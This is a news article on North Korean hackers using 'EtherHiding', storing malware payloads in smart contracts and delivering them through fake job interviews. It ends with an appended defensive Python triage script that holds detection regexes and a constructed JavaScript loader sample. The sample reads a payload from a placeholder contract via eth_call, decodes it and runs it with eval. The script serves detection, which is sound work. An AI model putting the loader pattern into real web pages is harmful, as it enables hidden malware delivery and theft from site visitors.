North Korean hackers hide crypto-theft malware inside smart contracts


Published:
2025-10-18 11:06:29


North Korean cybercriminals have refined their technique: they now inject malware directly into smart contracts to siphon off digital funds.

The new attack strategy

They use seemingly legitimate contracts that run malicious code in the background. The malware activates during routine transactions, redirecting funds to wallets controlled by the hackers.

The sophisticated modus operandi

The attackers exploit the decentralized nature of DeFi protocols to hide their activity. The compromised contracts go unnoticed in standard audits, operating silently until they carry out the theft.

Victims do not even notice the problem until they check their balances days later. By then, the funds are already being laundered through multiple decentralized exchanges.

While regulators are still debating how to classify cryptocurrencies, the hackers have already found a way to classify them directly into their own wallets.

North Korean hackers turn to EtherHiding

Google mentioned that it has linked the use of EtherHiding to a social engineering campaign tracked by Palo Alto Networks as Contagious Interview, which was carried out by North Korean actors. According to Socket researchers, the group expanded its operation with a new malware loader, XORIndex. The loader has accumulated thousands of downloads, with the targets being job seekers and individuals believed to own digital assets or sensitive credentials.

In this campaign, the North Korean hackers use JADESNOW malware to distribute a JavaScript variant of INVISIBLEFERRET, which has been used to carry out numerous cryptocurrency thefts. The campaign targets developers in the crypto and technology industries, stealing sensitive data and digital assets and gaining access to corporate networks. It centers on a social engineering tactic that mimics legitimate recruitment processes using fake recruiters and fabricated companies.

Fake recruiters lure candidates to platforms like Telegram or Discord, after which the malware is delivered to their systems and devices through fake coding tests or software downloads disguised as technical assessments or interview fixes. The campaign uses a multi-stage infection process, usually involving malware such as JADESNOW, INVISIBLEFERRET, and BEAVERTAIL, to compromise the victim’s devices. The malware affects Windows, Linux, and macOS systems.

Researchers detail the challenges EtherHiding poses

EtherHiding gives attackers a significant advantage, with GTIG noting that it is a particularly challenging threat to mitigate. One core element of EtherHiding that is concerning is its decentralized nature: the payload is stored on a permissionless, decentralized blockchain, making it hard for law enforcement or cybersecurity firms to take it down because there is no central server. The identity of the attacker is also hard to track because of the pseudonymous nature of blockchain transactions.

It is also hard to remove malicious code from a smart contract deployed on the blockchain if you are not the owner of the contract. The attacker in control of the smart contract, in this case the North Korean hackers, can also update the malicious payload at any time. While security researchers may try to warn the community about a malicious contract by tagging it, that does not stop the hackers from continuing to use the smart contract for their malicious activities.

In addition, attackers can retrieve their malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making it hard for researchers to track their activity. According to the threat research report, EtherHiding represents a “shift towards next-generation bulletproof hosting” where the defining features of blockchain technology are being used by scammers for malicious purposes.
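A defender-side triage script, added here as an illustration and not taken from the article or from Google's report: it flags page scripts that combine the read-only chain call described above with hex decoding and dynamic code execution, while letting an ordinary dapp widget through. The indicator labels, weights and both sample snippets are constructed for this example.

```python
"""Hypothetical triage of page scripts for EtherHiding-style loaders.

Scores a JavaScript blob on three behaviours: (a) a read-only blockchain call,
(b) turning a hex/encoded result back into text, (c) running text as code.
A normal dapp does (a) and maybe (b); only a loader also does (c)."""
import re

# (label, weight, pattern): labels and weights are our own choices, not a vendor signature.
INDICATORS = [
    ("chain_read", 2, re.compile(r"\beth_(?:call|getStorageAt)\b|\.methods\.\w+\([^)]*\)\.call\(", re.I)),
    ("decode", 1, re.compile(r"\b(?:fromCharCode|toUtf8String|hexToUtf8|hexToAscii|atob|parseInt)\s*\(", re.I)),
    ("dynamic_exec", 3, re.compile(r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|\.appendChild\s*\(\s*\w*script", re.I)),
    ("obfuscation", 1, re.compile(r"(?:\\x[0-9a-f]{2}){8,}|\w\[\s*['\"][\w$]+['\"]\s*\]\s*\(", re.I)),
]
REVIEW_SCORE = 4  # decode + dynamic_exec alone is worth a look but is not the EtherHiding shape


def triage(script: str) -> dict:
    """Return indicator hit counts, a weighted score and a verdict for one script."""
    hits = {label: len(pat.findall(script)) for label, _, pat in INDICATORS}
    score = sum(weight for label, weight, _ in INDICATORS if hits[label])
    # The article's defining trait: payload fetched with a read-only call, then executed.
    loader_shape = hits["chain_read"] > 0 and hits["dynamic_exec"] > 0
    if loader_shape:
        verdict = "suspicious"
    elif score >= REVIEW_SCORE:
        verdict = "review"
    else:
        verdict = "benign"
    return {"hits": hits, "score": score, "verdict": verdict}


# Constructed samples, not captured code. The first mimics a token-balance widget,
# the second the loader shape described in the article (placeholder names throughout).
BENIGN_DAPP = """
const res = await fetch(RPC_URL, {method: "POST", body: JSON.stringify(
  {jsonrpc: "2.0", id: 1, method: "eth_call", params: [{to: TOKEN, data: balanceOfCalldata}, "latest"]})});
document.getElementById("bal").innerText = BigInt((await res.json()).result).toString();
"""
LOADER_SHAPE = """
const res = await fetch(RPC_URL, {method: "POST", body: JSON.stringify(
  {jsonrpc: "2.0", id: 1, method: "eth_call", params: [{to: CONTRACT, data: SELECTOR}, "latest"]})});
const hex = (await res.json()).result.slice(2);
let s = ""; for (let i = 0; i < hex.length; i += 2) s += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
eval(s);
"""

if __name__ == "__main__":
    for name, js in (("benign_dapp", BENIGN_DAPP), ("loader_shape", LOADER_SHAPE)):
        print(name, triage(js))
```

Run it over scripts pulled from a suspected compromised site; a "suspicious" verdict means the script both reads from the chain and executes what it read, which is the behaviour a contract tag alone cannot stop.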

